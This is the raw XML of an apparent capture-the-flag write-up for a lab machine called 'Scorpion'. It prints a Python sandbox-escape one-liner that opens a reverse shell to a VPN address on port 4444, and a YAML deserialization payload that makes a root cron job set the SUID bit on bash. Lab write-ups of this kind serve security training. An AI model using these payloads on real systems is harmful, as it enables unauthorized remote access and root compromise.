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SCORPION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mwga7986bj2l"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5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execution of the tool, we identified two open web ports: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3000</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Now, we will direct our attention to the web service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67100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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analysis, we determined that it is a completely static page. Now, we will proceed to inspect the web service on port 3000.</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5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some interactions, we identified the possibility of executing Python code.</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62300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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several attempts to execute commands remotely, we identified that we are dealing with a sandbox, which limits the use of certain keywords such as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"import"</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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, among others.</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62300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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conducting some research on how to bypass restrictions and import libraries to achieve remote code execution, I came across the article below. It proposes a solution that allows us to overcome these limitations by converting the necessary keywords into strings, reversing them, and calling them directly.</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The Craziest Python Sandbox Escape</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reelix's blog where he chats about whatever he wants to really :p</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https://www.reelix.za.net/2021/04/the-craziest-python-sandbox-escape.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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pict>
          <v:rect style="width:0.0pt;height:1.5pt" o:hr="t" o:hrstd="t" o:hralign="center" fillcolor="#A0A0A0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3022600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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Through remote code execution, it becomes possible to send a reverse shell payload, which will result in obtaining a shell on the server.</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getattr(getattr(__builtins__,'__tropmi__'[::-1])('so'[::-1]),'metsys'[::-1])('/bin/bash -c "sh -i &gt;&amp; /dev/tcp/&lt;ip-vpn&gt;/4444 0&gt;&amp;1"');</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1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11300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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receive the shell:</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3162300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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y8c09jjtx5rn" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>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1498600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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lo2l0jvu0zbi" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">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dhc60teeof00" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrading the Shell</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5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the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">index.js</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can obtain our first flag.</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35100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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45w2zwh7j704" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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accessing the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/opt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory, it is possible to identify the presence of a subfolder called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"script"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Inside this subfolder, we find the script </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file.py</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5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summary, the code performs the following steps: it opens a YAML file at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/file.yml</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, reads its content, uses the PyYAML library to load and parse the YAML data. Then, it creates an instance of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Execute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class, whose </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run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method reads the file, and finally, the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">yaml.load</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> function is used to load the YAML data from the file, storing it in the variable </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">data</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verify whether this script is executed with root user privileges, possibly as a cronjob. If it is identified that the code runs as root, there is a potential vulnerability to exploit. It is worth noting that the code uses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yaml.load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which is known to present vulnerabilities related to YAML deserialization. This vulnerability, known as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">YAML Deserialization</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, could be exploited to escalate privileges on the system.</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hyperlink r:id="rId21">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://swisskyrepo.github.io/PayloadsAllTheThingsWeb/Insecure</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proceed by downloading the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pspy</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool and sending it to the server. Pspy is a command-line tool developed to monitor processes without requiring root privileges. This tool allows observing commands executed by other users, cron tasks, among others.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033">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Deserialization/YAML/#summary</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId22">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/DominicBreuker/pspy</w:t>
        </w:r>
      </w:hyperlink>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5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5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execute the tool </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./pspy64.</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04900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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confirmation that the root user is executing the script, we can create a file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file.yml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containing the following content:</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!!python/object/apply:os.system ["chmod u+s /bin/bash"]</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the script execution, we obtain the Bash binary with the SUID bit set. Now, we can access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 to retrieve the final flag.</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5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E">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3" name="image5.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image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3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Scorpion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hyperlink" Target="https://github.com/DominicBreuker/pspy" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://swisskyrepo.github.io/PayloadsAllTheThingsWeb/Insecure" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.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1.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8.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.reelix.za.net/2021/04/the-craziest-python-sandbox-escape.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.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image" Target="media/image1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1rofaJH+15R6f6zy05LYt6HIw==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLm13Z2E3OTg2YmoybDIOaC55OGMwOWpqdHg1cm4yDmgubG8ybDBqdnUwemJpMg5oLmRoYzYwdGVlb2YwMDIOaC40NXcyendoN2o3MDQyDmguMTc1ZjVjczk0ejBvOAByITE1amVCejBDRG5jQjZCSEVzckVteU83WFBrWWdNd3JGNw==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